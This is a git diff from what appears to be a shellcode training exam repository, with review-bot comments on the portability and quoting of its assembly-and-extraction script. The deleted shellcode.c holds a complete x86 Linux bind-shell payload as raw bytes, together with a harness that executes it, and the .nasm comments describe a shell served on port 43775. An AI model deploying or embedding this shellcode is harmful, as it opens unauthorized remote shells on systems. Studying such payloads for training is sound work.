diff --git a/exam1/compile_all.sh b/exam1/compile_all.sh index d1e70dd..7435e73 100755 --- a/exam1/compile_all.sh +++ b/exam1/compile_all.sh @@ -1,6 +1,6 @@ #!/usr/bin/env sh # -# Create shellcode with specific port +# Creates shell_bind_tcp shellcode with specific port # # Example # ./compile_all.sh shell_bind_tcp 50123 @@ -14,6 +14,7 @@ ARG1=$1 # Specify program ARG2=$2 # Specify port + # # Check script usage and file existence # @@ -21,16 +22,22 @@ if [ -z "$ARG1" ]; then echo " [I] Please specify program you would like to assemble!" echo " [I] Usage example: ./compile_all.sh shell_bind_tcp 50123" exit 1; -elif ! [ -e "$ARG1".nasm ]; then +elif [ -e "$ARG1" ]; then + if [[ $ARG1 == *nasm* ]]; then + ARG1=$(echo -ne $ARG1 |sed 's/.....$//g'); + echo $ARG1 + fi +elif [ ! -e "$ARG1".nasm ]; then ARG1_GUESS=$(echo $ARG1 |sed 's/.nasm//g') if [ -e "$ARG1_GUESS" ]; then ARG1=$ARG1_GUESS else - echo " [E] File "$ARG1".nasm does not exist!" + echo " [E] File "$ARG1" does not exist!" exit 1; fi fi + # # Validate nasm source file # @@ -54,9 +61,9 @@ fi # # Assemble and link # -echo " [+] Assembling "$1".nasm with NASM ..." +echo " [+] Assembling "$ARG1".nasm with NASM ..." nasm -f elf32 -o $ARG1.o $ARG1.nasm && \ -echo " [+] Linking "$1".o ..." && \ +echo " [+] Linking "$ARG1".o ..." && \ ld -m elf_i386 -o $ARG1 $ARG1.o && \ echo -e " [+] Generating shellcode with objdump ..." && \ SHELLCODE=$(objdump -d ./$ARG1 |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/' |sed 's/$/"/g') diff --git a/exam1/shell_bind_tcp.nasm b/exam1/shell_bind_tcp.nasm index ca6e805..c9233a8 100644 --- a/exam1/shell_bind_tcp.nasm +++ b/exam1/shell_bind_tcp.nasm @@ -16,8 +16,8 @@ ; 2013 March ; ; DESC: -; Binds to a port 43775 -; Execs Shell on incoming connection +; - Binds to a port 43775 +; - Execs Shell on incoming connection ; ; ; Shellcode size: 141 bytes 
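Review bot: The new `elif [ -e "$ARG1" ]` branch relies on `[[ $ARG1 == *nasm* ]]` and `echo -ne`, neither of which is POSIX, while the shebang is `#!/usr/bin/env sh`; where `sh` is a strict POSIX shell such as dash, the `[[` test fails and the suffix is never stripped. The pattern `*nasm*` also matches "nasm" anywhere in the path, and `sed 's/.....$//g'` then removes the last five characters whatever they are, so an existing path that merely contains "nasm" is truncated. The branch never checks that `$ARG1.nasm` exists, so an existing file without that suffix (for example the binary linked by an earlier run) passes; whether the later "Validate nasm source file" section catches this is not visible in the hunk. The leftover `echo $ARG1` looks like debug output. Stripping the suffix with `${ARG1%.nasm}` and then doing a single existence test covers all the cases the three branches try to handle:

```shell
# … unchanged: empty-argument usage check (if [ -z "$ARG1" ] … exit 1), closed with fi …
case "$ARG1" in
    *.nasm) ARG1=${ARG1%.nasm} ;;   # strip only a trailing ".nasm"
esac
if [ ! -e "$ARG1.nasm" ]; then
    echo " [E] File $ARG1.nasm does not exist!"
    exit 1
fi
```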
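Review bot: `$ARG1` is still expanded outside the quotes in the two changed `echo` lines and in the `nasm`, `ld` and `objdump` commands around them, so a file name containing whitespace or glob characters is split into several arguments. Keep the expansion inside the quotes, e.g. `echo " [+] Assembling $ARG1.nasm with NASM ..."` and `nasm -f elf32 -o "$ARG1.o" "$ARG1.nasm"`. Quoting does not help with a name that begins with `-`, which the tools would read as an option; the argument check earlier in the script is the place to reject that. `echo -e` on the objdump message is also not portable under the `sh` shebang, and `printf` avoids the problem. The command chain continues past the end of the hunk.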
diff --git a/exam1/shell_bind_tcp_smaller.nasm b/exam1/shell_bind_tcp_smaller.nasm index fea2a07..4a4b73e 100644 --- a/exam1/shell_bind_tcp_smaller.nasm +++ b/exam1/shell_bind_tcp_smaller.nasm @@ -16,8 +16,8 @@ ; 2013 March ; ; DESC: -; Binds to a port 43775 -; Execs Shell on incoming connection +; - Binds to a port 43775 +; - Execs Shell on incoming connection ; ; ; Shellcode size: 108 bytes diff --git a/exam1/shellcode.c b/exam1/shellcode.c deleted file mode 100644 index dbc7a19..0000000 --- a/exam1/shellcode.c +++ /dev/null @@ -1,11 +0,0 @@ -#include -#include - -unsigned char code[] = "\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\xaa\xff"; - -main() -{ - printf("Shellcode Length: %d\n", strlen(code)); - int (*ret)() = (int(*)())code; - ret(); -}